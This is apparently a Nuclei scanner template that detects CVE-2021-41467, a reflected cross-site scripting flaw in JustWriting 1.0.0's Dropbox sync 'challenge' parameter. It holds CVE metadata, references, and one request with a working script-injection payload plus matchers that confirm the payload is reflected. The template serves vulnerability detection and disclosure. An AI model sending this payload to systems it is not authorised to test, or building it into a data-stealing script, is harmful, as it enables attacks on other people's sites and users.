48 lines
1.6 KiB
YAML
48 lines
1.6 KiB
YAML
id: CVE-2021-41467
|
|
|
|
info:
|
|
name: JustWriting - Cross-Site Scripting
|
|
author: madrobot
|
|
severity: medium
|
|
description: A cross-site scripting vulnerability in application/controllers/dropbox.php in JustWriting 1.0.0 and below allow remote attackers to inject arbitrary web script or HTML via the challenge parameter.
|
|
remediation: |
|
|
Upgrade to the latest version to mitigate this vulnerability.
|
|
reference:
|
|
- https://github.com/hjue/JustWriting/issues/106
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-41467
|
|
- https://github.com/hjue/JustWriting/
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2021-41467
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00133
|
|
epss-percentile: 0.48156
|
|
cpe: cpe:2.3:a:justwriting_project:justwriting:1.0.0:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: justwriting_project
|
|
product: justwriting
|
|
tags: cve,cve2021,justwriting,xss,justwriting_project
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/sync/dropbox/download?challenge=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "</script><script>alert(document.domain)</script>"
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "text/html"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a0047304502205a0afe2e65252e43598a9f814f49ed92a7c348cef36528c3f247bc0c14d7ccf50221008a878df55e877f67aa00107b9408d1311fdf78e3fd13eaecf92257b77d32480e:922c64590222798bb761d5b6d8e72950 |